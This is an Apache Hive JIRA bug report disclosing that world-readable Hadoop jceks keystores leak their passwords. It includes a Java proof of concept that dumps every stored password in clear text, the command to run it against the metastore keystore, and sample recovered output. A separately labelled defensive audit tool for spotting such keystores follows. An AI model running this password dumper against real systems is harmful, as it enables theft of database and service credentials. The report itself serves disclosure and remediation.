Posted to dev@hive.apache.org by "Oleksiy Sayankin (JIRA)" <ji...@apache.org> on 2018/05/31 11:02:00 UTC
[jira] [Created] (HIVE-19746) Hadoop credential provider allows to read passwords
Oleksiy Sayankin created HIVE-19746:
---------------------------------------
Summary: Hadoop credential provider allows to read passwords
Key: HIVE-19746
URL: https://issues.apache.org/jira/browse/HIVE-19746
Project: Hive
Issue Type: Bug
Reporter: Oleksiy Sayankin
Assignee: Oleksiy Sayankin
This simple program allows reading any password from any {{jceks}} file:
{code}
package com.test.app;

import java.io.IOException;
import java.util.List;

import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.security.alias.CredentialProvider;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

public class PasswordReader {

    public static void main(String[] args) throws IOException {
        if (args == null || args.length == 0) {
            throw new IllegalArgumentException("Credential provider path is not set");
        }
        String credentialProviderPath = args[0];

        // Point the Hadoop credential provider framework at the keystore given on the command line.
        Configuration configuration = new Configuration();
        configuration.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, credentialProviderPath);

        // The first configured provider is the keystore itself; list every alias stored in it.
        CredentialProvider credentialProvider = CredentialProviderFactory.getProviders(configuration).get(0);
        List<String> aliases = credentialProvider.getAliases();
        for (String alias : aliases) {
            // Configuration.getPassword() resolves the alias through the provider and returns the clear text.
            System.out.println(alias + " = " + new String(configuration.getPassword(alias)));
        }
    }
}
{code}
{code}
java -cp $(hadoop classpath):password-reader.jar com.test.app.PasswordReader jceks://hdfs/user/hive/hivemetastore.jceks
{code}
*RESULT*
{code}
javax.jdo.option.connectionpassword = 123456
{code}
File {{jceks://hdfs/user/hive/hivemetastore.jceks}} has {{-rw-r--r--}} permissions and {{hdfs:hdfs}} owner:group. We can't remove the world-readable permissions here, because Hive is configured for impersonation to allow users other than {{hdfs}} to connect to HiveServer2. When I removed the world-readable permissions I got the exception:
{code}
2018-05-31T10:08:40,191 ERROR [pool-7-thread-41] fs.Inode: Marking failure for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] fs.Inode: Throwing exception for: /user/hive/hivemetastore.jceks, error: Input/output error
2018-05-31T10:08:40,192 ERROR [pool-7-thread-41] metastore.RetryingHMSHandler: java.lang.RuntimeException: Error getting metastore password: null
at org.apache.hadoop.hive.metastore.ObjectStore.getDataSourceProps(ObjectStore.java:485)
at org.apache.hadoop.hive.metastore.ObjectStore.setConf(ObjectStore.java:279)
{code}
Any ideas on how to protect passwords?
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)
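As an added illustration of the exposure the report describes (this is not code from the issue or from the Hive or Hadoop projects), a hypothetical audit tool that reads the configured {{hadoop.security.credential.provider.path}} and reports every file-backed keystore whose permission bits grant read access beyond its owner. It locates the store the same way Hadoop's JavaKeyStoreProvider does but never opens it; the class and method names are assumptions.

```java
import java.io.IOException;
import java.net.URI;
import java.util.ArrayList;
import java.util.List;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.FileStatus;
import org.apache.hadoop.fs.Path;
import org.apache.hadoop.fs.permission.FsAction;
import org.apache.hadoop.fs.permission.FsPermission;
import org.apache.hadoop.security.ProviderUtils;
import org.apache.hadoop.security.alias.CredentialProviderFactory;

/** Hypothetical audit: flags keystores named in the credential provider path that others can read. */
public class CredentialStoreAudit {
    /** One finding per file-backed store whose permission bits grant read beyond the owner. */
    public static List<String> findReadableStores(Configuration conf) throws IOException {
        List<String> findings = new ArrayList<>();
        String[] providers = conf.getStrings(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH);
        if (providers == null) return findings; // nothing configured, nothing to check
        for (String provider : providers) {
            URI uri = URI.create(provider);
            // Only file-backed stores (jceks://hdfs/..., localjceks://file/...) carry permission bits.
            if (!"jceks".equals(uri.getScheme()) && !"localjceks".equals(uri.getScheme())) {
                continue;
            }
            // jceks://hdfs/user/hive/x.jceks nests the real path hdfs:/user/hive/x.jceks; unnest it as Hadoop does.
            Path storePath = ProviderUtils.unnestUri(uri);
            FileStatus status = storePath.getFileSystem(conf).getFileStatus(storePath);
            FsPermission perm = status.getPermission();
            boolean groupRead = perm.getGroupAction().implies(FsAction.READ);
            boolean otherRead = perm.getOtherAction().implies(FsAction.READ);
            if (groupRead || otherRead) {
                String who = otherRead ? "everyone" : "group " + status.getGroup();
                findings.add(provider + " is " + perm + " (" + status.getOwner() + ":" + status.getGroup()
                        + "), readable by " + who + ": anyone with that access can list its passwords");
            }
        }
        return findings;
    }

    public static void main(String[] args) throws IOException {
        Configuration conf = new Configuration(); // picks up core-site.xml from the classpath
        if (args.length > 0) {
            conf.set(CredentialProviderFactory.CREDENTIAL_PROVIDER_PATH, args[0]);
        }
        for (String finding : findReadableStores(conf)) {
            System.out.println("WARNING: " + finding);
        }
    }
}
```

Run with the same classpath as the report's program ({{hadoop classpath}}) and the provider URI as the argument; the {{-rw-r--r--}} store from the report is flagged as readable by everyone.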